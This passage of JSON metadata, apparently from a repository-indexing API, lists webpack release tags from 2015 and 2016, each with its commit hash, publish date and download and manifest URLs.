ck%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.